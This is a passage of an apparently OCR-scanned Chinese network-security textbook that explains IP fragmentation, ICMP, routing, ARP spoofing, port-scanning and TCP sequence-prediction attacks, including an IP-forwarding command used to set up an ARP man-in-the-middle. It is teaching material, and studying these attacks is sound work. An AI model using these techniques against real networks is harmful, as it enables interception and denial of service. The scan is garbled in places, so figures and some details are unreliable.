第 一 个 分 片 10000 1420 1400 0 1 1 
第 二 个 分 片 10000 1420 1400 175 1 1 
第 三 个 分 片 10000 1420 1400 350 1 
第 四 个 分 片 10000 780 760 525 | 0 


从 表 2. 1 可知, 每 个 分 片 的 数据 不 能 重 琶 ,这 样 目的 主机 可 以 把 同一 标识 的 所 有 分 片 按 
照 段 偏 移 大 小 顺序 排 好 ,并 且 在 看 到 MF==0 的 分 片 后 进行 重组 。 

由 于 IP 数据 报 的 最 大 长 度 为 65 536B, 所 以 最 后 一 个 分 片 的 13b 段 偏 移 量 字段 的 最 大 
值 是 (1 1111 1111 1110), 二 0x1FFE 二 8190, 意 味 着 该 分 片 的 第 一 个 字 节 在 原 数 据 报 中 是 第 
8190X8 二 65 520B( 字 节 编 号 从 0 开始 ) ,此 时 该 分 片 的 长 度 最 大 为 65 536 一 65 520 一 16B。 
正常 情况 下 ,由 路 由 器 进行 的 分 片 操作 各 个 分 片 都 不 会 出 现 数 据 重合, 且 数 据 长 度 的 总 和 等 
于 原始 数据 报 。 但 如 果 攻 击 者 构造 一 批 数据 报 , 它 们 的 标识 号 递增 ,但 标志 位 DF=1， 
MF 王 0, 说 明 是 最 后 一 个 分 片 . 偏 移 量 为 0x1FFE, 报 文 长 度 为 20B。 那 么 收 到 这 些 数据 报 的 
目标 主机 会 发 现 每 个 报 文 的 总 长 都 是 65 540B, 大 于 65 536B, 会 发 生 什么 情况 呢 ? 

具体 的 处 理 方式 要 看 目标 主机 上 TCP/IP 协议 的 具体 实现 ,有 的 操作 系统 在 发 现 问题 
后 直接 当 作 报 文 传输 错误 丢弃 掉 , 但 有 的 操作 系统 对 异常 情况 考虑 不 周 ,就 可 能 导致 系统 崩 
演 , 如 Linux 早期 版 本 和 Windows 95/98 遇 到 这 种 情况 会 造成 堆栈 溢出 ,占用 大 量 系统 资 
源 , 直 至 崩溃 。Jolt2 攻击 和 泪 滴 (teardrop) 攻 击 就 利用 了 这 一 点 ,攻击 者 发 送 多 个 伪造 有 
重生 的 数据 分 片 到 目标 主机 ,最 终 使 目标 主机 崩溃 。 

现在 的 网 络 操作 系统 已 经 完善 了 TCP/IP 协议 栈 的 异常 处 理 , 并 且 各 种 人 侵 检测 系统 
和 防火 墙 也 可 以 及 时 发 现 异 常 的 IP 碎片 ,从 而 能 够 阻止 这 种 类 型 的 攻击 。 


2.3.4 ICMP 攻击 
IP 数据 报 在 网 中 传输 时 ,路 由 器 自主 地 完成 寻 址 与 数据 转发 ,不 需要 源 主机 和 目标 主 


42 网 络 安全 





机 的 参与 ; 并 且 IP 又 是 无 连接 的 协议 ,目标 主机 不 会 告知 源 主 机 数据 是 否 正确 接收 到 。 因 
此 ,在 TCP/IP 的 网 络 层 协议 中 ,除了 转发 数据 的 了 P 协议 ,还 提供 了 ICMP(Internet 控制 报 
文 协议 ) 。ICMP 的 设计 初衷 是 : 一 旦 发 生 错 误 ,如 发 生 网 络 拥塞 .目标 网 络 不 能 到 达 、 目 标 
主机 不 可 达 、TTL 超时 等 ,由 路 由 器 通过 ICMP 向 源 主 机 报告 差错 信息 。 除 了 差错 报 文 ， 
ICMP 还 可 以 用 于 传输 简单 的 控制 报 文 及 一 些 请 求 (echo) 与 应 答 (echo reply) 报 文 。ICMP 
报 文 封装 在 IP 数据 报 中 ,如 图 2. 10 所 示 , 即 ICMP 报 文 作为 数据 ,加 上 IP 报头 ,IP 报头 的 
协议 域 protocol==1。 








checksum | ICMP 数 据 





IP 报 头 | type | code 


ICMP 报 头 
ICMP 报 文 | 


IP 数 据 报 














图 2.10 ICMP 报 文 作为 IP 数据 报 的 数据 





ICMP 报头 如 图 2. 11 所 示 。 
1 1 2 n ( 字 节 ) 
类 型 | 代码 校 验 和 | 数据 区 
LL 头 标 | 


2.11 ICMP 报头 




















与 ICMP 有 关 的 攻击 很 多 ,如 IP 地 址 扫描 、ping of death .ping flooding、Smurf、ICMP 
重 定向 报 文 .ICMP 主机 不 可 达 和 TTL 超时 报 文 等 。 
1. IP 地 址 扫描 


IP 地 址 扫描 经 常 出 现在 整个 攻击 过 程 的 开始 阶段 ,为 攻击 者 收集 信息 。 这 种 攻击 用 
ping 命令 就 能 实现 ,在 TCP/IP 实现 中 ,用 户 的 ping 命令 就 是 利用 回应 请 求 与 应 答 报 文 ( 回 
应 请 求 报 文 的 类 型 二 8, 回 应 请 求 应 答 报 文 的 类 型 =0) 测 试 目 的 主机 是 否 可 以 到 达 。 如 果 攻 
击 者 成 功 接收 到 应 答 报 文 , 则 说 明 目 的 主机 处 于 “活跃 ”状态 ,可 以 作为 攻击 目标 。 

2. ping of death 

ICMP 报 文 作为 IP 报 文 的 数据 传输 ,由 于 IP 报 文 的 最 大 总 长 度 为 65 536B, 因 此 早期 
路 由 器 也 限定 ICMP 包 的 最 大 长 度 为 64KB, 在 读 取 ICMP 首部 后 .根据 其 中 的 “类 型 ”和 
“代码 "字段 判断 为 何 种 ICMP 报 文 ,并 分 配 相应 内 存 作为 缓冲 区 。 当 出 现 畸 形 的 ICMP 包 
时 ,例如 ,声称 自己 的 长 度 超过 ICMP 上 限 , 也 就 是 加 载 的 长 度 超过 64KB 上 限时 ,就 会 出 现 
内 存 分 配 错 误 ,导致 TCP/IP 堆栈 崩溃 ,致使 接收 方 死机 。 

3. ping flooding 和 Smurf 

在 某 一 时 刻 多 台 主 机 都 对 目标 主机 使 用 ping 程序 ,以 耗 尽 目 标 主机 的 网 络 带 宽 和 处 理 
能 力 。 一 个 网 站 1s 内 收 到 数 万 个 ICMP 回应 请 求 报 文 就 可 能 使 它 过 度 繁忙 而 无 法 提供 正 
常服 务 一 一 这 就 是 拒绝 服务 攻击 方法 。1999 年 ,“ 爱 国 主 义 黑客 "发动 全 国 网 民 在 某 一 时 刻 
开始 ping 某 美国 站 点 ,试图 ping 死 远 程 服务 器 ,就 是 一 次 典型 的 ping flooding 攻击 。 
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Smurf 攻击 则 是 攻击 者 伪造 一 个 源 地 址 为 受害 主机 的 地 址 .目标 地 址 是 反弹 网 络 的 广播 
地 址 的 ICMP 回应 请 求 数据 包 , 当 反弹 网 络 的 所 有 主机 返回 ICMP 回应 数据 包 的 时 候 将 淹没 
受害 主机 。 它 的 原理 和 ping flooding 类 似 , 若 反弹 网 络 规模 较 大 ,攻击 的 威力 也 很 巨大 。 

4. ICMP 重 定向 报 文 

初始 网 关 一 旦 检测 到 某 数据 报 经 非 最 优 路 径 传输 , 则 它 一 边 将 该 数据 报 转发 出 去 ,一 边 
向 主机 发 送 一 个 路 径 重 定向 报 文 ,告诉 主机 去 往 相应 目的 的 最 优 路 径 。 主 机 开机 后 经 不 断 
积累 便 能 掌握 越 来 越 多 的 最 优 路 径 信息 。 通 过 ICMP 重 定向 报 文 ,能 够 保证 主机 拥有 一 个 
动态 的 既 小 且 优 的 寻 径 表 。 但 是 ,ICMP 没有 认证 功能 ,攻击 者 可 以 冒充 初始 网 关 向 目标 主 
机 发 送 ICMP 重 定向 报 文 , 诱 使 目标 主机 更 改 寻 径 表 , 其 结果 是 到 达 某 一 IP 子 网 的 报 文 全 
部 丢失 或 都 经 过 一 个 攻击 者 能 控制 的 网 关 。 

5. ICMP 主机 不 可 达 和 TTL 超时 报 文 

当 数 据 报 传输 路 径 中 的 路 由 器 发 现 传输 错误 时 发 送 ICMP 主机 不 可 达 和 TTL 超时 报 
文 给 源 主机 ,主机 接收 到 此 类 报 文 后 会 重新 建立 TCP 连接 。 攻 击 者 可 以 利用 此 类 报 文 干扰 
正常 的 通信 。 


2.3.5 路 由 欺骗 


Internet 中 IP 包 的 传输 路 径 完全 由 路 由 表决 定 , 主 机 的 路 由 表 可 以 依据 ICMP 重 定向 
报 文 而 改变 ,路 由 器 的 路 由 表 则 要 依据 路 由 协议 的 路 由 更 新 报 文 来 修改 。 前 者 属于 ICMP 
攻击 ,后 者 则 属于 路 由 欺骗 。 

2.3.5.1 RIP 路 由 欺骗 

RIP(Routing Information Protocol, 路 由 信息 协议 ) 是 早期 用 于 自治 域内 传播 路 由 信息 
的 路 由 协议 ,路 由 器 需要 定时 向 它 的 相 邻 路 由 器 发 送 本 地 的 RIP 路 由 更 新 信息 。 由 于 RIP 
v1.0 中 没有 提供 对 RIP 数据 包 发 送 者 的 认证 机 制 , 所 以 其 他 路 由 器 在 收 到 更 新 RIP 数据 包 
时 一 般 不 做 检查 ,这 也 给 了 攻击 者 可 乘 之 机 。 攻 击 者 可 以 声称 他 所 控制 的 路 由 器 A 可 以 最 
快 地 到 达 某 一 站 点 B, 从 而 诱 使 发 往 B 的 数据 包 由 A 中 转 。 这 时 ,有 3 种 可 能 ， 

。 如 果 A 根本 不 存在 ,攻击 者 自己 伪造 的 路 由 被 网 内 的 路 由 器 接受 后 ,就 会 使 得 大 量 

目的 站 点 为 B 的 报 文 无 法 顺利 转发 ,导致 无 法 访问 B。 
。 如 果 A 存在 ,但 并 非 受到 攻击 者 的 控制 ,那么 攻击 者 的 行为 将 导致 大 量 报 文 涌 向 A， 
可 能 超过 A 所 能 承受 的 最 大 吞吐 量 , 导 致 A 的 性 能 严重 下 降 。 

。 如 果 A 受 攻击 者 控制 ,那么 攻击 者 可 侦 听 、 算 改 用 户 发 往 B 的 数据 。 

2.3.5.2 JIP 源 路 由 欺骗 

IP 报 文 首部 的 可 选项 中 有 “严格 源 路 径 ”" 和 “自由 源 路 径 ”, 用 于 指定 到 达 目 的 站 点 的 路 
由 。 正 常情 况 下 ,目标 主机 如 果 有 应 答 或 其 他 信息 返回 源 站 ,可 以 直接 将 该 路 由 反 向 运用 作 
为 应 答 的 回复 路 径 。 

攻击 实例 如 图 2. 12 所 示 ,主机 A(IP 地 址 是 192. 168. 100. 11) 是 主机 B 的 信任 主机 , 主 
机 X 想 冒充 主机 A 从 主机 B(IP 为 192. 168. 100. 1) 获 得 某 些 服 务 。 

(1) 攻击 者 修改 距离 X 最 近 的 路 由 器 G2, 使 到 达 G2 且 包 含 目 的 地 址 192. 168. 100. 1 
的 数据 包 以 主机 X 所 在 的 网 络 为 目的 地 。 
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图 2.12 RIP 路 由 欺骗 攻击 实例 图 


(2) 攻击 者 X 利用 IP 欺骗 (把 数据 包 的 源 地 址 改 为 192. 168. 100. 11) 向 主机 B 发 送 带 
有 源 路 由 选项 (指定 最 近 的 路 由 器 G2) 的 数据 包 。 

(3) 当 B 回 送 数 据 包 时 , 按 收 到 数据 包 的 源 路 由 选项 反 转 使 用 源 路 由 ,就 传送 到 被 更 改 
过 的 路 由 器 G2。 

(4) G2 路 由 表 已 被 修改 , 收 到 也 的 数据 包 时 ,G2 根据 路 由 表 把 数据 包 发 送 到 X 所 在 网 
络 ,X 可 在 其 局 域 网 内 侦 听 ,收取 此 数据 包 。 


2.3.6 ARP 欺骗 


假设 攻击 者 和 目标 主机 在 同一 局 域 网 内 ,攻击 者 想 要 截获 和 侦 听 目标 主机 到 网 关 间 的 
所 有 数据 。 如 果 这 个 局 域 网 使 用 集线器 连接 各 个 节点 ,那么 攻击 者 只 需要 把 网 卡 设置 为 混 
杂 模 式 ,就 可 以 用 链 路 层 的 监听 获得 想 要 的 信息 。 但 当局 域 网 采用 交换 机 连接 各 个 节点 时 ， 
交换 机 会 根据 帧 的 目标 MAC 地 址 查找 端口 映射 表 ,确定 转发 的 某 个 具体 端口 ,而 不 是 向 所 
有 端口 广播 。 此 时 ,攻击 者 可 以 首先 试探 交换 机 是 否 存在 失败 保护 模式 (fail-safe mode) 。 
失败 保护 模式 是 交换 机 的 特殊 模式 状态 。 交 换 机 在 维护 IP 地 址 和 MAC 地 址 的 映射 关系 
时 会 花费 一 定 的 处 理 能 力 , 当 网 络 通 信 时 出 现 大 量 虚假 MAC 地 址 时 , 某 些 类 型 的 交换 机 会 
出 现 过 载 情况 ,转换 到 失败 保护 模式 ,其 工作 方式 和 集线器 相同 。 工 具 macof 可 完成 此 项 攻 
击 。 如 果 交 换 机 不 存在 失败 保护 模式 , 则 需要 使 用 ARP(Address Resolution Protocol ,地址 
解析 协议 ,是 一 种 将 IP 地 址 转化 成 物理 地 址 的 协议 ) 欺 骗 技 术 。 

如 图 2. 13 所 示 ,主机 A(IP 地 址 为 192. 168. 0.4) 想 要 与 路 由 器 (IP 地 址 为 192. 168. 0. 1) 
通信 ,正常 的 ARP 地 址 转换 过 程 如 下 : 

(1) 主机 A 以 广播 的 方式 发 送 ARP 请 求 ,希望 得 到 路 由 器 的 MAC 地 址 。 

(2) 交换 机 收 到 ARP 请 求 ,并 转发 给 连接 到 交换 机 的 各 个 主机 。 同 时 ,交换 机 更 新 它 
的 MAC 地 址 和 端口 映射 表 , 即 将 192. 168. 0. 4 绑 定 它 所 连接 的 端口 。 

(3) 路 由 器 更 新 ARP 缓存 表 , 绑 定 A 的 IP 地 址 和 MAC 地 址 。 

(4) 交换 机 收 到 了 路 由 器 对 A 的 ARP 响应 ,查找 MAC 地 址 和 端口 的 映射 表 , 把 此 
ARP 响应 数据 包 发 送 到 相应 端口 。 同 时 ,交换 机 更 新 它 的 MAC 地 址 和 端口 之 间 的 映射 
表 , 即 将 192. 168. 0. 1 绑 定 它 所 连接 的 端口 。 

(5) 主机 A 收 到 ARP 响应 数据 包 , 更 新 ARP 缓存 表 , 绑 定 路 由 器 的 IP 地 址 和 MAC 
地 址 。 

(6) 主机 A 使 用 更 新 后 的 MAC 地 址 信息 把 数据 发 送 给 路 由 器 ,通信 通道 就 此 建立 。 
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图 2.13 ARP 欺骗 


要 进行 ARP 欺骗 ,攻击 者 需要 做 一 些 准备 工作 : 

(1) 攻击 主机 需要 两 块 网 卡 , 设 其 IP 地 址 分 别 为 : 192. 168. 0.5 和 192. 168. 0.6, 分 别 
连接 到 交换 机 ,准备 截获 和 侦 听 目标 主机 (192. 168. 0. 3) 和 路 由 器 (192. 168. 0. 1) 之 间 的 所 
有 通信 。 

(2) 攻击 者 主机 需要 有 IP 数据 包 的 转发 能 力 ,在 Linux 下 执行 下 面 的 命令 即 可 启动 IP 
转发 功能 : 


echo 1 >/proc/sys/net/ipv4/ip_forward 


做 完 上 述 准备 后 ,攻击 者 迅速 诱 使 目标 主机 和 路 由 器 都 和 它 建立 通信 ,使 自己 成 为 中 间 
人 (Man in Middle, MiM)。 攻 击 者 会 打开 两 个 命令 界面 ,执行 两 次 ARP 欺骗 : 

(1) 诱 使 目标 主机 认为 攻击 者 的 主机 有 路 由 器 的 MAC 地 址 : 利用 IP 地 址 欺骗 技术 ， 
伪造 网 关 的 IP 地 址 从 攻击 者 主机 的 一 块 网 卡 上 发 送 给 目标 主机 ARP 请 求 包 , 则 错误 的 
MAC 地 址 和 IP 地 址 的 映射 将 被 更 新 到 目标 主机 。 

(2) 使 路 由 器 相信 攻击 者 的 主机 具有 目标 主机 的 MAC 地 址 。 

(3) 路 由 器 收 到 A 的 ARP 请 求 后 ,发 出 带 有 自身 MAC 地 址 的 ARP 响应 。 


2.4 传输 层 攻 击 技术 


在 网 络 层 攻 击 的 基础 上 ,攻击 者 可 以 锁定 目标 主机 。 而 针对 目标 主机 的 各 种 传输 层 攻 
击 手 段 则 更 为 丰富 。 在 传输 层 可 以 通过 各 种 端口 扫描 技术 获得 目标 主机 的 操作 系统 、 运 行 
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的 服务 等 信息 ,从 而 针对 这 些 系 统 与 服务 的 漏洞 有 的 放 矢 ,采用 TCP 初始 序号 预测 、TCP 
欺骗 .SYN flooding 等 技术 进行 攻击 。 


2.4.1 端口 扫描 


连接 在 Internet 上 的 计算 机 需要 一 个 IP 地 址 标识 自己 ,并 采用 IP 协议 实现 网 络 互联 。 
这 些 主机 可 以 提供 多 种 应 用 服务 ,许多 基于 TCP/IP 的 程序 可 以 通过 互联 网 启动 ,这些 程序 
大 都 是 面向 客户 /服务 器 的 程序 。 

当 inetd(Internet 超级 服务 器 ,是 监视 一 些 网 络 请 求 的 守护 进程 ) 接 收 到 一 个 连接 请 求 
时 , 它 便 启 动 一 个 服务 ,与 请 求 服务 的 客户 机 器 通信 。 为 简化 这 一 过 程 ,每 个 应 用 程序 (比如 
文件 传输 FTP、 远 程 登录 Telnet、WWW 访问 等 ) 被 赋予 一 个 唯一 的 地 址 ,这 个 地 址 称 为 
端口 。 

指定 应 用 程序 与 特殊 端口 相连 , 当 任 何 连 接 请 求 到 达 该 端口 时 ,inetd 根据 端口 号 调用 
相应 的 服务 程序 ,如 FTP、Telnet 等 。 为 了 使 各 种 服务 协调 运行 ,TCP/IP 协议 簇 定义 了 两 
种 传输 协议 : TCP 和 UDP, 每 种 应 用 服务 都 分 配 了 一 个 传输 层 的 协议 端口 。 

端口 是 TCP/IP 体系 中 传输 层 的 服务 访问 点 ,传输 层 到 某 端口 的 数据 都 被 绑 定 到 该 端 
口 相 应 的 进程 接收 。 每 个 端口 都 拥有 一 个 16b 的 端口 号 (一 台 主 机 可 以 定义 2 一 65 536 个 
TCP 端口 和 22 一 65 536 个 UDP 端口 )。 用 户 自己 提供 的 服务 可 以 使 用 自由 端口 号 。 一 
般 , 系 统 服务 使 用 的 端口 号 为 0 一 1023 ,用 户 可 以 自己 定义 的 端口 号 从 1024 开始 。 

TCP/IP 的 服务 一 般 通 过 IP 地 址 加 一 个 端口 号 来 决定 ,如 文件 服务 器 (FTP) 用 TCP 的 
21 号 端口 ,简单 电子 邮件 传输 协议 (SMTP) 的 服务 端口 是 TCP 的 25 号 端口 ,邮箱 协议 
(POP3) 的 端口 是 TCP 的 110 号 端口 。 客 户 端 程序 一 般 通 过 服务 器 的 IP 地 址 和 端口 号 与 
服务 器 应 用 程序 进行 连接 。 因 此 ,端口 是 一 个 潜在 的 通信 通道 ,也 可 能 成 为 一 个 入 侵 通道 。 

当 攻 击 者 通过 网 络 扫描 确定 了 目标 计算 机 之 后 ,可 以 尝试 和 目标 主机 的 一 系列 端口 ( 通 
常 为 保留 端口 和 常用 端口 ) 建 立 连接 或 请 求 通信 , 若 目 标 主机 有 回应 , 则 打开 了 相应 的 应 用 
程序 或 服务 ,攻击 者 就 可 以 使 用 应 用 层 的 一 些 攻 击 手 段 。 

端口 扫描 程序 非常 容易 编写 。 掌握 了 初步 的 Socket 编程 知识 , 便 可 以 轻而易举 地 编写 
出 能 够 在 UNIX、Windows 等 操作 系统 下 运行 的 端口 扫描 程序 (附录 B 给 出 一 个 简单 的 端 
口 扫描 程序 源码 )。 如 果 利 用 端口 扫描 程序 扫描 网 络 上 的 一 台 主机 ,这 人 台 主 机 运行 的 是 什么 
操作 系统 以 及 该 主机 提供 了 哪些 服务 便 一 目 了 然 。 

端口 扫描 程序 对 于 系统 管理 人 员 来 说 是 一 个 非常 简便 实用 的 工具 。 端 口 扫描 程序 可 以 
帮助 系统 管理 员 更 好 地 管理 系统 与 外 界 的 交互 。 当 系统 管理 员 扫 描 到 finger 服务 所 在 的 端 
口号 (79/TCP) 时 , 便 应 想到 这 项 服务 是 否 关 闭 。 假 如 原来 是 关闭 的 ,现在 又 被 扫描 到 , 则 说 
明 有 人 非法 取得 了 系统 管理 员 的 权限 ,改变 了 inetd. conf 文件 中 的 内 容 。 因 为 这 个 文件 只 
有 系统 管理 员 可 以 修改 ,这 说 明 系统 的 安全 正在 受到 侵犯 。 

如 果 扫 描 到 一 些 标准 端口 之 外 的 端口 ,系统 管理 员 必 须 清楚 这 些 端口 提供 了 一 些 什么 
服务 ,是 不 是 允许 的 。 许 多 系统 就 常常 将 WWW 服务 的 端口 放 在 8000 端口 或 另 一 个 通常 
不 用 的 端口 上 。 系 统管 理 员 必须 知道 8000 或 男 一 个 端口 是 否 被 WWW 服务 使 用 了 。 

不 过 ,端口 扫描 有 时 也 会 忽略 一 些 不 常用 的 端口 。 例 如 ,许多 黑客 将 为 自己 开 的 后 门 设 
在 一 个 非常 高 的 端口 上 ,使 用 了 一 些 不 常用 的 端口 ,就 容易 被 端口 扫描 程序 忽略 。 黑 客 通过 
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这 些 端口 可 以 任意 使 用 系统 的 资源 ,也 为 他 人 非法 访问 这 人 台 主 机 开 了 方便 之 门 。 

常用 端口 扫描 技术 有 TCP connect 扫描 、SYN 扫描 、FIN 扫描 ,IP 段 扫 描 、UDP 端口 扫 
描 、 慢 速 扫描 等 。 

1. TCP connect 扫描 

最 基本 的 TCP 扫描 是 对 于 TCP 连接 的 扫描 。connect() 函 数 用 于 与 每 一 个 感 兴趣 的 
目标 计算 机 的 端口 进行 连接 。 如 果 该 端口 处 于 侦 听 状态 ,那么 connectO 〇 就 能 成 功 ,否则 ,这 
个 端口 不 能 使 用 , 即 没 有 提供 服务 。 

TCP 扫描 的 优点 如 下 : 

。 入 侵 者 不 需要 任何 权限 ,系统 中 的 任何 用 户 都 有 权利 使 用 这 个 调用 。 

。 速度 快 。 如 果 对 每 个 目标 端口 以 串 行 的 方式 使 用 单独 的 connect() 调 用 ,需要 较 长 

的 时 间 ; 然而 ,入 侵 者 可 以 通过 同时 打开 多 个 套 接 字 加 速 扫描 。 使 用 非 阻 塞 I/O 允 
许 人 侵 者 设置 一 个 低 的 时 间 用 尽 周期 ,同时 观察 多 个 套 接 字 。 

这 种 方法 的 缺点 是 很 容易 被 发 觉 ,并 且 被 过 滤 掉 。 目 标 计算 机 的 日 志文 件 也 会 记录 一 
连 串 的 连接 和 连接 是 否 出 错 的 服务 消息 ,并 且 能 很 快 地 关闭 连接 。 

2. TCP SYN 扫描 

TCP connect 扫描 需要 建立 一 个 完整 的 TCP 连接 ,很 容易 被 目标 主机 发 现 。 而 TCP 
SYN 扫描 则 是 “ 半 开 放 ” 扫 描 一 一 扫描 程序 不 必 打 开 一 个 完全 的 TCP 连接 。 扫 描 程 序 发 送 
一 个 SYN 数据 包 , 好 像 准备 打开 一 个 实际 的 连接 并 等 待 ACK 一 样 (参考 TCP 的 三 次 握手 
建立 TCP 连接 的 过 程 );。 如 果 返 回 SYN|ACK ,表示 端口 处 于 侦 听 状态 ; 如 果 返 回 RST, 表 
示 端 口 没 有 处 于 侦 听 态 。 如 果 收 到 一 个 SYN|ACK , 则 扫描 程序 必须 再 发 送 一 个 RST 信号 
来 关闭 这 个 连接 过 程 。 这 种 扫描 技术 的 优点 在 于 : 一 般 不 会 在 目标 计算 机 上 留 下 记录 。 但 
入 侵 者 必须 有 root 权限 才能 建立 自己 的 SYN 数据 包 。 

3. TCP FIN 扫描 

通常 ,防火 墙 和 包 过 滤器 会 对 一 些 指定 的 端口 进行 监视 ,并 能 检测 并 过 滤 掉 TCP SYN 
扫描 。 但 是 ,基于 RFC 793, 目 标 系统 应 该 向 所 有 关闭 端口 回 送 RST, 所 以 FIN 数据 包 可 能 
会 没有 任何 麻烦 地 通过 防火 墙 。FIN 扫描 的 基本 思想 是 : 通常 关闭 的 端口 会 用 RST 来 回 
复 FIN 数据 包 ,而 打开 的 端口 会 忽略 FIN 数据 包 , 不 做 回复 。 这 种 方法 和 系统 的 实现 有 一 
定 的 关系 。 有 的 系统 不 管 端口 是 否 打开 ,都 回复 RST(Windows 95/NT 和 部 分 UNIX 系 
统 , 如 CISCO、.BSDI.HP/VUX、MVS 和 IRIX) ,这 时 TCP FIN 扫描 就 不 能 使 用 。 

4. Fragmentation 扫描 

这 是 一 种 超 小 数据 包 的 扫描 , 它 将 要 发 送 的 数据 包 打包 成 非常 小 的 IP 包 ,通过 TCP 包 
头 分 成 几 段 , 放 和 不同 IP 包 中 ,使 得 过 滤 程 序 难以 过 滤 ,因此 容易 实现 自己 想 要 的 扫描 。 

5. UDP 端口 扫描 

由 于 UDP 协议 是 非 面向 连接 的 ,对 UDP 端口 的 探测 也 就 不 可 能 像 TCP 端口 的 探测 
那样 依赖 于 连接 建立 过 程 , 这 也 使 得 UDP 端口 扫描 的 可 靠 性 不 高 。 所 以 ,虽然 UDP 协议 
较 TCP 协议 显得 简单 ,但 是 对 UDP 端口 的 扫描 却 是 相当 困难 的 。 因 为 打开 的 端口 对 扫描 
探测 并 不 发 送 一 个 确认 ,关闭 的 端口 也 并 不 需要 发 送 一 个 错误 数据 包 。 但 是 当主 机 向 未 打 





48 网 络 安全 





开 的 UDP 端口 发 送 数据 包 时 ,会 返回 ICMP_PORT_UNREACH 错误 报 文 ,这 样 就 能 发 现 
哪个 端口 是 关闭 的 。 

6. 慢 速 扫描 

一 般 , 扫 描 检 测 器 是 通过 监视 某 个 时 间 段 里 一 台 特 定 主机 被 连接 的 数目 来 决定 其 是 否 
在 被 扫描 ,所 以 ,攻击 者 可 以 通过 使 用 扫描 速度 慢 的 扫描 软件 ,使 检测 软件 判断 不 出 它 在 进 
行 扫描 。 

7. 多 线程 扫描 

应 用 多 线程 技术 ,在 端口 扫描 程序 中 同时 打开 多 处 运行 单元 ,各 线程 同时 执行 ,可 以 大 
大 加 快 扫描 的 速度 。 


2.4.2 TCP 初始 序号 预测 


TCP 提供 可 靠 的 端 到 端 传输 。 通 常 TCP 连接 建立 一 个 包括 三 次 握手 的 序列 。 客 户 端 
选择 并 传输 一 个 初始 序列 号 (SEQ) ,设置 标志 位 SYN 王 1, 告诉 服务 器 它 需要 建立 连接 。 服 
务 器 确认 这 个 传输 ,并 发 送 它 本 身 的 序列 号 ,设置 标志 位 ACK==1, 同 时 告知 下 一 个 期 待 获 
得 的 数据 序列 号 。 客 户 再 确认 它 。 经 过 三 次 确认 后 ,双方 开始 传输 数据 。 这 一 过 程 如 
图 2.14 所 示 。 


E 机 A E 机 B 
E34 百 
三 怠 

ee ee 
标志 : SYN=1,ACK=1 
收 到 确认 | | Seq=2000，Ack=1001 
建立 连接 ， 本 
开始 数据 传输 | 
去 二 
Se Pe 收 到 A 发 的 2000B 
发 送 1500B 标志 : ACK=1 
收 到 B 发 的 1500B | | so Acke-3001 
标志 : ACK=1 


Seq=3001, Ack=4501 


收 到 B 发 的 1500B 
标志 : ACK=1 
Seq=5001, Ack=6001 








| 


收 到 A 发 的 2000B 
标志 : ACK=1 
Seq=4501, Ack=5001 


2.14 ”TCP 建立 连接 和 传输 数据 的 过 程 


在 数据 传输 的 过 程 中 ,接收 方 必须 确认 所 收 到 的 数据 。 传 输 的 可 靠 性 由 数据 包 中 的 多 
位 控制 字段 来 提供 ,其 中 最 重要 的 是 数据 序列 号 和 数据 确认 ,分 别 用 Seq 和 Ack 来 表示 。 
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TCP 为 每 一 个 数据 字 节 分 配 一 个 序列 号 ,并 且 可 以 向 已 成 功 接收 的 由 源 地 址 所 发 送 的 数据 
包 回 复 表 示 确 认 的 ACK 号 (目的 地 址 确认 数据 包 序 列 是 源 地 址 的 数据 包 序列 ,而 不 是 自己 
发 送 的 数据 包 序列 ) 。ACK 在 确认 的 同时 ,还 携带 了 下 一 个 期 望 获得 的 数据 序列 号 。 

显然 ,TCP 提供 了 比 IP 更 高 的 可 靠 性 , 它 能 够 处 理 数据 包 丢 失 、 重 复 或 顺序 亲 乱 等 不 
良 情况 。TCP 的 序列 号 可 以 看 作 是 32 位 的 计数 器 ,从 0 计数 至 2” 一 1。 通 过 向 所 传送 出 的 
所 有 字 节 分 配 序 列 号 ,并 期 待 接收 端 对 发 送 端 所 发 出 的 数据 提供 收 旋 确 认 , 配 合 重 传 的 机 
制 ,TCP 能 保证 可 靠 的 传送 。 接 收 端 利用 序列 号 确保 数据 的 先后 顺序 ,除去 重复 的 数据 包 。 
每 一 个 TCP 连接 交换 的 数据 是 顺序 编号 的 。 确 认 位 (ACK) 对 所 接收 的 数据 进行 确认 ,并 
且 指 出 下 一 个 期 待 接收 的 数据 序列 号 。 

TCP 序列 号 预测 的 漏洞 最 早 由 Morris 提出 。 他 使 用 TCP 序列 号 预测 ,即使 没有 从 服 
务 器 得 到 任何 响应 ,也 能 够 产生 一 个 TCP 报 文 的 序列 号 ,从 而 欺骗 本 地 网 络 上 的 主机 。 

首先 来 了 解 序数 编号 、 如 何 选择 初始 序列 号 和 初始 序列 号 如 何 根 据 时 间 变 化 。 产 生 初 
始 序列 号 的 常用 方法 有 下 列 3 种 。 

1. 64K 规则 


这 是 一 种 最 简单 的 机 制 ,目前 仍 在 一 些 主机 上 使 用 。 当 主机 启动 后 ,序列 编号 初始 化 为 
1( 实 际 上 并 非 如 此 ,初始 序列 号 由 tcp_init 函数 随机 确定 )。 初 始 序列 号 (ISN) 每 秒 增加 
128 000 ,如果 有 连接 出 现 ,每 次 连接 将 把 计数 器 的 数值 增加 64 000。 很 显然 ,这 使 得 用 于 表 
示 初 始 序列 号 的 32 位 计数 器 在 没有 连接 的 情况 下 每 9. 32h 复位 一 次 ,从 而 最 大 限度 地 减少 
原 有 连接 的 信息 干扰 当前 连接 的 机 会 。 如 果 初 始 序列 号 是 随意 选择 的 ,那么 就 不 能 保证 现 
有 序列 号 不 同 于 先前 的 序列 号 。 如 果 有 一 个 数据 包 最 终 跳 出 了 循环 , 回 到 了 “ 原 有 ”的 连接 ， 
显然 会 发 生 对 现 有 连接 的 干扰 。 

2. 与 时 间 相 关 的 产生 规则 

这 种 方法 很 流行 ,实现 也 比较 简单 , 它 允 许 序列 号 产生 器 产生 与 时 间 相 关 的 值 。 这 个 产 
生 器 在 计算 机 自 举 时 产生 初始 值 , 依 照 每 台 计 算 机 各 自 的 时 钟 增加 。 由 于 各 台 计 算 机 上 的 
时 钟 很 难 完 全 相等 , 增 大 了 序列 号 的 随机 性 。 

3. 伪 随 机 数 产 生 规则 

较 新 的 操作 系统 使 用 伪 随 机 数 产生 器 产生 初始 序列 号 。 

对 于 前 两 种 方式 产生 的 初始 序号 ,攻击 者 在 一 定 程度 上 可 以 预测 。 首 先 ,攻击 者 发 送 一 
个 SYN 包 , 目 标 主机 响应 后 ,攻击 者 可 以 知道 目标 主机 的 TCP/IP 协议 栈 当 前 使 用 的 初始 
序列 号 。 然 后 ,攻击 者 可 以 估计 数据 包 的 往返 时 间 ,根据 相应 的 初始 序列 号 产生 方法 较 精 确 
